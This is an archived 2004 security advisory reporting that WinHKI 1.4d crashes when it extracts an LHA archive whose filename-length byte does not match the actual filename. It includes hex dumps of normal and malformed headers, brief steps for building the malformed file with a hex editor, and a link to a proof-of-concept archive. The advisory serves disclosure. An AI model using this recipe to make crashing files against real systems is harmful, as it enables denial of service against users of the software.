~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application: WinHKI Vendors: http://www.webtoolmaster.com Versions: 1.4d Platforms: Windows Bug: LHA File Incorrect Filename Handeling Leads to Crash/Underflow Exploitation: Local (extract file) Date: 24 Dec 2004 Author: Rafel Ivgi, The-Insider E-Mail: the_insider@private Website: http://theinsider.deep-ice.com ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 1) Introduction 2) Bugs 3) The Code ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ =============== 1) Introduction =============== WinHKI is a file archiever which supports: LHA, CAB, HKI, JAR, LHA,TAR, GZ compressions. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ====== 2) Bug ====== This is a normal LHA compressed file header 00000000 1EFF 2D6C 6830 2D1B 0000 001B 0000 0039 ..-lh0-........9 00000010 7378 3120 0008 5C31 3032 2E68 746D 4543 sx1 ..\102.htmEC 00000020 3C73 6372 6970 7466 3E61 6C65 7274 2829 <scriptf>alert() 00000030 3C2F 7363 7269 7074 3E0D 0A62 5F2D 6C68 </script>..b_-lh 00000040 642D 0000 0000 0000 0000 94A4 8431 1000 d-...........1.. The last byte in the following code, specifies the length of the compressed file name. Once its smaller than the filename's length WinHKI crashes. 00000000 1EFF 2D6C 6830 2D1B 0000 001B 0000 0039 ..-lh0-........9 00000010 7378 3120 0020 sx1 . This may be an underflow, i couln't tell its an underflow for sure because my MSDEV went into a 100 CPU% loop while debugging this. All we need to do is shorten the length of the filename specified inside the file or to change the byte which sets the filename's size to a higher value. For Example: 00000000 1EFF 2D6C 6830 2D1B 0000 001B 0000 0039 ..-lh0-........9 00000010 7378 3120 0020 5C31 3073 7373 7373 7373 sx1 . \10sssssss 00000020 3232 2E68 746D 4543 3C73 6372 6970 7466 22.htmEC<scriptf 00000030 3E61 6C65 7274 2829 3C2F 7363 7269 7074 >alert()</script 00000040 3E0D 0A62 5F2D 6C68 642D 0000 0000 0000 >..b_-lhd-...... 00000050 0000 94A4 8431 1000 4C5C 446F 6375 6D65 .....1..L\Docume Using any Hex editor such as HexWorkshop, just add anything to the filename. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ =========== 3) The Code =========== An online proof of concept can be found at: http://theinsider.deep-ice.com/poc.lha - (also contains folder names from my old computer...) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ --- Rafel Ivgi, The-Insider http://theinsider.deep-ice.com "Scripts and Codes will make me D.O.S , but they will never HACK me."
This archive was generated by hypermail 2.1.3 : Thu Jan 06 2005 - 07:22:52 PST